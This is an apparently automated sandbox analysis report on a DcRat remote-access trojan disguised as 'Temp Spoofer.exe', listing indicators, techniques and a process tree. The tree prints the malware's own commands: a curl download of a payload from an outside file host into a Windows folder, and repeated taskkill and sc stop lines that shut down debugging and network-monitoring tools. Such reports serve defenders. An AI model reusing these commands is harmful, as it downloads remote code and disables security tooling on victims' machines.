dcrat | 550b6cbdefab0c183b41f9fa96c8ed0797efaf13081fd6ca745f30670d8725f0

Resubmissions

24-11-2024 01:20

241124-bp5v6sspcr 10

24-11-2024 01:18

241124-bn4xgswqav 10

Analysis

max time kernel
62s
max time network
71s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
24-11-2024 01:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Temp Spoofer.exe
Size

80KB
MD5

5374b62745b86ac86e6a4c89921182cd
SHA1

921a4a2d5c6489bc5a0b5697bf19678495dfadbf
SHA256

550b6cbdefab0c183b41f9fa96c8ed0797efaf13081fd6ca745f30670d8725f0
SHA512

e56cb7ebd3be67e94776043f885412e5f42cfc0c258fe9a2f2fe3dd79f115b0416f64df5cfc82fa275ada0787224ece1400a86bd9567f6e014361ef87082461f
SSDEEP

1536:brvp14xgT6UellETcCMUlzLCYzha6a2UWwZyeMcxV6MFae:bbVjnTcCMUZLZBUWwZhMcCMFa

Score

10^/10

dcrat discovery evasion execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3472	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4860	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4792	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3920	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	572	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4604	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4548	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	412	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1908	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2676	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3280	2584	schtasks.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	2584	schtasks.exe	85

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
4528	powershell.exe
5048	powershell.exe
4056	powershell.exe
3600	powershell.exe
1044	powershell.exe
1048	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

physmeme.exeWScript.exeMedal.exephysmeme.exeWScript.exeTemp Spoofer.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	physmeme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	Medal.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	physmeme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000\Control Panel\International\Geo\Nation	Temp Spoofer.exe

Executes dropped EXE 7 IoCs

Processes:

physmeme.exephysmeme.exeMedal.exephysmeme.exephysmeme.exeTextInputHost.exeMedal.exe

pid	Process
3480	physmeme.exe
1060	physmeme.exe
3460	Medal.exe
5056	physmeme.exe
3460	physmeme.exe
2908	TextInputHost.exe
4404	Medal.exe

Loads dropped DLL 2 IoCs

Processes:

physmeme.exephysmeme.exe

pid	Process
3480	physmeme.exe
5056	physmeme.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

physmeme.exephysmeme.exe

description	pid	Process	procid_target
PID 3480 set thread context of 4676	3480	physmeme.exe	119
PID 5056 set thread context of 5084	5056	physmeme.exe	227

Drops file in Program Files directory 4 IoCs

Processes:

Medal.exe

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\dllhost.exe	Medal.exe
File created	C:\Program Files\Mozilla Firefox\5940a34987c991	Medal.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\en-US\cmd.exe	Medal.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\en-US\ebf1f9fa8afd6d	Medal.exe

Drops file in Windows directory 4 IoCs

Processes:

curl.execurl.execurl.execurl.exe

description	ioc	Process
File created	C:\Windows\Speech\physmeme.exe	curl.exe
File opened for modification	C:\Windows\Speech\physmeme.exe	curl.exe
File opened for modification	C:\Windows\Speech\physmeme.exe	curl.exe
File opened for modification	C:\Windows\Speech\physmeme.exe	curl.exe

Launches sc.exe 22 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
2668	sc.exe
1552	sc.exe
936	sc.exe
4140	sc.exe
2192	sc.exe
2204	sc.exe
5056	sc.exe
3164	sc.exe
4036	sc.exe
3108	sc.exe
1944	sc.exe
4420	sc.exe
1088	sc.exe
1492	sc.exe
392	sc.exe
4136	sc.exe
2808	sc.exe
4084	sc.exe
392	sc.exe
2116	sc.exe
2268	sc.exe
836	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
2728	3480	WerFault.exe	110
3716	5056	WerFault.exe	219

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WScript.execmd.exephysmeme.exeWScript.execmd.exephysmeme.exephysmeme.exeaspnet_regiis.exephysmeme.exeaspnet_regiis.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe

Kills process with taskkill 45 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
4760	taskkill.exe
3496	taskkill.exe
1060	taskkill.exe
3100	taskkill.exe
2220	taskkill.exe
900	taskkill.exe
1060	taskkill.exe
1324	taskkill.exe
4860	taskkill.exe
4604	taskkill.exe
4272	taskkill.exe
5068	taskkill.exe
2212	taskkill.exe
4688	taskkill.exe
1972	taskkill.exe
3200	taskkill.exe
1552	taskkill.exe
2204	taskkill.exe
3128	taskkill.exe
4216	taskkill.exe
1008	taskkill.exe
4968	taskkill.exe
4720	taskkill.exe
1836	taskkill.exe
4296	taskkill.exe
5032	taskkill.exe
3176	taskkill.exe
4492	taskkill.exe
900	taskkill.exe
236	taskkill.exe
2128	taskkill.exe
1900	taskkill.exe
3584	taskkill.exe
3676	taskkill.exe
4432	taskkill.exe
2204	taskkill.exe
4336	taskkill.exe
220	taskkill.exe
388	taskkill.exe
4376	taskkill.exe
3276	taskkill.exe
1924	taskkill.exe
4968	taskkill.exe
2456	taskkill.exe
1204	taskkill.exe

Modifies registry class 3 IoCs

Processes:

physmeme.exeMedal.exephysmeme.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	physmeme.exe
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	Medal.exe
Key created	\REGISTRY\USER\S-1-5-21-1669812756-2240353048-2660728061-1000_Classes\Local Settings	physmeme.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	Process
2024	schtasks.exe
4596	schtasks.exe
2676	schtasks.exe
4604	schtasks.exe
1088	schtasks.exe
2608	schtasks.exe
3472	schtasks.exe
4496	schtasks.exe
4860	schtasks.exe
3920	schtasks.exe
572	schtasks.exe
4792	schtasks.exe
412	schtasks.exe
1652	schtasks.exe
3280	schtasks.exe
4548	schtasks.exe
2036	schtasks.exe
1908	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Temp Spoofer.exe

pid	Process
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe
5020	Temp Spoofer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	Process
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	4272	taskkill.exe
Token: SeDebugPrivilege	2204	taskkill.exe
Token: SeDebugPrivilege	2456	taskkill.exe
Token: SeDebugPrivilege	3100	taskkill.exe
Token: SeDebugPrivilege	3128	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	220	taskkill.exe
Token: SeDebugPrivilege	4296	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	5068	taskkill.exe
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	4216	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	3676	taskkill.exe
Token: SeDebugPrivilege	3176	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	1008	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	4492	taskkill.exe
Token: SeDebugPrivilege	4860	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	388	taskkill.exe
Token: SeDebugPrivilege	4376	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1188	WMIC.exe
Token: SeSecurityPrivilege	1188	WMIC.exe
Token: SeTakeOwnershipPrivilege	1188	WMIC.exe
Token: SeLoadDriverPrivilege	1188	WMIC.exe
Token: SeSystemProfilePrivilege	1188	WMIC.exe
Token: SeSystemtimePrivilege	1188	WMIC.exe
Token: SeProfSingleProcessPrivilege	1188	WMIC.exe
Token: SeIncBasePriorityPrivilege	1188	WMIC.exe
Token: SeCreatePagefilePrivilege	1188	WMIC.exe
Token: SeBackupPrivilege	1188	WMIC.exe
Token: SeRestorePrivilege	1188	WMIC.exe
Token: SeShutdownPrivilege	1188	WMIC.exe
Token: SeDebugPrivilege	1188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1188	WMIC.exe
Token: SeRemoteShutdownPrivilege	1188	WMIC.exe
Token: SeUndockPrivilege	1188	WMIC.exe
Token: SeManageVolumePrivilege	1188	WMIC.exe
Token: 33	1188	WMIC.exe
Token: 34	1188	WMIC.exe
Token: 35	1188	WMIC.exe
Token: 36	1188	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1188	WMIC.exe
Token: SeSecurityPrivilege	1188	WMIC.exe
Token: SeTakeOwnershipPrivilege	1188	WMIC.exe
Token: SeLoadDriverPrivilege	1188	WMIC.exe
Token: SeSystemProfilePrivilege	1188	WMIC.exe
Token: SeSystemtimePrivilege	1188	WMIC.exe
Token: SeProfSingleProcessPrivilege	1188	WMIC.exe
Token: SeIncBasePriorityPrivilege	1188	WMIC.exe
Token: SeCreatePagefilePrivilege	1188	WMIC.exe
Token: SeBackupPrivilege	1188	WMIC.exe
Token: SeRestorePrivilege	1188	WMIC.exe
Token: SeShutdownPrivilege	1188	WMIC.exe
Token: SeDebugPrivilege	1188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1188	WMIC.exe
Token: SeRemoteShutdownPrivilege	1188	WMIC.exe
Token: SeUndockPrivilege	1188	WMIC.exe
Token: SeManageVolumePrivilege	1188	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Temp Spoofer.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 5020 wrote to memory of 2916	5020	Temp Spoofer.exe	81
PID 5020 wrote to memory of 2916	5020	Temp Spoofer.exe	81
PID 5020 wrote to memory of 3392	5020	Temp Spoofer.exe	82
PID 5020 wrote to memory of 3392	5020	Temp Spoofer.exe	82
PID 2916 wrote to memory of 4968	2916	cmd.exe	83
PID 2916 wrote to memory of 4968	2916	cmd.exe	83
PID 3392 wrote to memory of 1756	3392	cmd.exe	84
PID 3392 wrote to memory of 1756	3392	cmd.exe	84
PID 5020 wrote to memory of 4540	5020	Temp Spoofer.exe	86
PID 5020 wrote to memory of 4540	5020	Temp Spoofer.exe	86
PID 4540 wrote to memory of 1836	4540	cmd.exe	87
PID 4540 wrote to memory of 1836	4540	cmd.exe	87
PID 5020 wrote to memory of 228	5020	Temp Spoofer.exe	88
PID 5020 wrote to memory of 228	5020	Temp Spoofer.exe	88
PID 228 wrote to memory of 392	228	cmd.exe	89
PID 228 wrote to memory of 392	228	cmd.exe	89
PID 5020 wrote to memory of 4876	5020	Temp Spoofer.exe	90
PID 5020 wrote to memory of 4876	5020	Temp Spoofer.exe	90
PID 4876 wrote to memory of 4272	4876	cmd.exe	91
PID 4876 wrote to memory of 4272	4876	cmd.exe	91
PID 5020 wrote to memory of 1092	5020	Temp Spoofer.exe	92
PID 5020 wrote to memory of 1092	5020	Temp Spoofer.exe	92
PID 1092 wrote to memory of 2204	1092	cmd.exe	93
PID 1092 wrote to memory of 2204	1092	cmd.exe	93
PID 5020 wrote to memory of 4316	5020	Temp Spoofer.exe	94
PID 5020 wrote to memory of 4316	5020	Temp Spoofer.exe	94
PID 4316 wrote to memory of 2456	4316	cmd.exe	95
PID 4316 wrote to memory of 2456	4316	cmd.exe	95
PID 5020 wrote to memory of 4552	5020	Temp Spoofer.exe	96
PID 5020 wrote to memory of 4552	5020	Temp Spoofer.exe	96
PID 4552 wrote to memory of 3100	4552	cmd.exe	97
PID 4552 wrote to memory of 3100	4552	cmd.exe	97
PID 5020 wrote to memory of 3256	5020	Temp Spoofer.exe	98
PID 5020 wrote to memory of 3256	5020	Temp Spoofer.exe	98
PID 3256 wrote to memory of 3128	3256	cmd.exe	99
PID 3256 wrote to memory of 3128	3256	cmd.exe	99
PID 5020 wrote to memory of 2036	5020	Temp Spoofer.exe	100
PID 5020 wrote to memory of 2036	5020	Temp Spoofer.exe	100
PID 2036 wrote to memory of 1060	2036	cmd.exe	101
PID 2036 wrote to memory of 1060	2036	cmd.exe	101
PID 5020 wrote to memory of 4412	5020	Temp Spoofer.exe	102
PID 5020 wrote to memory of 4412	5020	Temp Spoofer.exe	102
PID 4412 wrote to memory of 220	4412	cmd.exe	103
PID 4412 wrote to memory of 220	4412	cmd.exe	103
PID 5020 wrote to memory of 4484	5020	Temp Spoofer.exe	104
PID 5020 wrote to memory of 4484	5020	Temp Spoofer.exe	104
PID 4484 wrote to memory of 4296	4484	cmd.exe	105
PID 4484 wrote to memory of 4296	4484	cmd.exe	105
PID 5020 wrote to memory of 4196	5020	Temp Spoofer.exe	106
PID 5020 wrote to memory of 4196	5020	Temp Spoofer.exe	106
PID 4196 wrote to memory of 5032	4196	cmd.exe	107
PID 4196 wrote to memory of 5032	4196	cmd.exe	107
PID 5020 wrote to memory of 1908	5020	Temp Spoofer.exe	108
PID 5020 wrote to memory of 1908	5020	Temp Spoofer.exe	108
PID 1908 wrote to memory of 5068	1908	cmd.exe	109
PID 1908 wrote to memory of 5068	1908	cmd.exe	109
PID 5020 wrote to memory of 3480	5020	Temp Spoofer.exe	110
PID 5020 wrote to memory of 3480	5020	Temp Spoofer.exe	110
PID 5020 wrote to memory of 3480	5020	Temp Spoofer.exe	110
PID 5020 wrote to memory of 1440	5020	Temp Spoofer.exe	112
PID 5020 wrote to memory of 1440	5020	Temp Spoofer.exe	112
PID 1440 wrote to memory of 1900	1440	cmd.exe	113
PID 1440 wrote to memory of 1900	1440	cmd.exe	113
PID 5020 wrote to memory of 4896	5020	Temp Spoofer.exe	114

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

cURL User-Agent 4 IoCs

Uses User-Agent string associated with cURL utility.

Processes:

description	flow	ioc
HTTP User-Agent header	6	curl/8.7.1
HTTP User-Agent header	32	curl/8.7.1
HTTP User-Agent header	45	curl/8.7.1
HTTP User-Agent header	56	curl/8.7.1

C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3392
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4540
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4876
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1092
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4316
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3256
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4412
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4196
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1908
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5068
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:3480
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4676
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 1172
    3⤵
    - Program crash
    PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4896
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:3156
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:4136
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:4420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:3596
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:1088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:1652
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:2116
